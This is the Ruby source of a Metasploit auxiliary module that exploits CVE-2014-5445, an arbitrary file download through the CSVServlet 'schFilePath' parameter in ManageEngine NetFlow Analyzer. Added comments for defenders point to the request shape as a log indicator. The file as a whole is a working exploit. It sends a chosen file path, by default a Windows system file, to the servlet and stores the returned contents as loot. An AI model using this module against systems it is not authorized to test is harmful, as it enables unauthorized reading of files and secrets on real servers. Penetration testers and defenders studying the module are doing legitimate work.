rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/netflow_file_download.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module for the CSVServlet arbitrary file download in ManageEngine
# NetFlow Analyzer (CVE-2014-5445, see 'References' below).
#
# Defender notes, drawn from what this file declares:
# * The module issues a single GET to <TARGETURI>/servlet/CSVServlet carrying
#   the requested path in the `schFilePath` query parameter.
# * 'SideEffects' is IOC_IN_LOGS, so that request shape is the indicator to
#   search for (presumably in the product's web access logs; confirm where
#   the deployment writes them).
# * Affected and fixed versions are not stated here beyond the tested range in
#   'Description'; consult the advisory listed in 'References'.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # Declares the module metadata and its user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',
      'Description' => %q{
        This module exploits an arbitrary file download vulnerability in CSVServlet
        on ManageEngine NetFlow Analyzer. This module has been tested on both Windows
        and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you
        must escape the backslash with a backslash.
      },
      'Author' => [
        'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2014-5445' ],
        [ 'OSVDB', '115340' ],
        [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],
        [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
      ],
      'DisclosureDate' => '2014-11-30',
      'Notes' => {
        # Declared impact profile: does not crash the service, but the
        # request is recorded in logs on the target.
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )
    super(module_info)

    # RPORT defaults to 8080, TARGETURI to '/netflow'; FILEPATH is the path
    # that is sent to the servlet.
    base_path_opt = OptString.new('TARGETURI', [ true, 'The base path to NetFlow Analyzer', '/netflow' ])
    file_path_opt = OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini'])
    register_options([ Opt::RPORT(8080), base_path_opt, file_path_opt ])
  end

  # Requests FILEPATH through CSVServlet and stores a non-empty 200 response
  # as loot.
  #
  # Outcomes, each reported on the console:
  # * Rex::ConnectionError while sending -> 'Could not connect.'
  # * no response, or a status other than 200 -> 'Failed to download file.'
  # * 200 with an empty body -> '0 bytes returned, ...'
  # * 200 with content -> body saved with store_loot and its path printed
  def run
    remote_path = datastore['FILEPATH']

    begin
      print_status("Downloading file #{remote_path}")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),
        'vars_get' => { 'schFilePath' => remote_path }
      })
    rescue Rex::ConnectionError
      print_error('Could not connect.')
      return
    end

    unless res && res.code == 200
      print_error('Failed to download file.')
      return
    end

    # A 200 with nothing in it is treated as "missing or empty"; the two
    # cases cannot be told apart from the response alone.
    contents = res.body.to_s
    if contents.empty?
      print_error('0 bytes returned, file does not exist or it is empty.')
      return
    end

    # Body is echoed only when verbose output is enabled.
    vprint_line(contents)

    loot_path = store_loot(
      'netflow.http',
      'application/octet-stream',
      datastore['RHOST'],
      res.body,
      File.basename(remote_path)
    )
    print_good("File saved in: #{loot_path}")
  end
end